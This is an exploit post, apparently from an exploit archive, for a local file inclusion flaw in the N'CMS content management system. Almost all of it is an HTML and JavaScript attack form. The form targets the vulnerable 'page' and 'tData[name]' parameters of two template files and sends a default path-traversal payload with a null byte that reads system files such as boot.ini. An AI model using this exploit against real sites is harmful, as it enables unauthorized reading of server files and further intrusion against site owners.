N'CMS local file include Vulnerability
Posted on 04 April 2010
====================================== N'CMS local file include Vulnerability ====================================== <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>#####coded by ahmadbady#####</title> <script language="JavaScript"> //=========================================================================== //( #Topic : N'CMS Updated 2010-02-24 //( #Bug type : local file include //( #Download : http://sourceforge.net/projects/n-cms/files/N-CMS%20Equipe/n-cms-equipe-V1.1C-Debug.zip/download //( #Advisory : //=========================================================================== //( #Author : ItSecTeam //( #Email : Bug@ITSecTeam.com # //( #Website: http://www.itsecteam.com # //( #Forum : http://forum.ITSecTeam.com # //--------------------------------------------------------------------- var variable1 ="?page=" var variable2 ="?tData[name]=" function it(){ if (xpl.file.value=="includs.php"){ variable1 = variable2; } xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+variable1+xpl.file0.value;xpl.submit(); } </script> </head> <body bgcolor="#FFFFFF"> <p align="left"><font color="#0000FF">N'CMS & N'Games local file include Vulnerability</font></p> <p align="left"><font color="#FF0000">vul1 file:/path/template/theme1/content/body.php</font></p> <p align="left"><font color="#FF0000">vul2 file:/path/template/theme1/content/includs.php</font></p> <p align="left"><font color="#0000FF">-----------------------------------</font></p> <form method="post" name="xpl" onSubmit="it();"> <p align="left"> <font size="2" face="Tahoma"> victim: <input type="text" name="victim" size="20";" style="color: #FFFFFF; background-color: #000000" value="http://127.0.0.1"> path: <input type="text" name="path" size="20";" style="color: #FFFFFF; background-color: #000000" value="/path/template/theme1/content/"> file: <input type="text" name="file" size="20";" style="color: #FFFFFF; background-color: #000000"> lfi code: <input type="text" name="file0" size="20";" style="color: #FFFFFF; background-color: #000000" value="..%2F..%2F..%2F..%2F..%2Fboot.ini%00"></p> </p> <center> </p> <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" value="reset" name="B2" style="float: left"></p> </form> <p><br> </p> </center> </body> </html> # Inj3ct0r.com [2010-04-04]
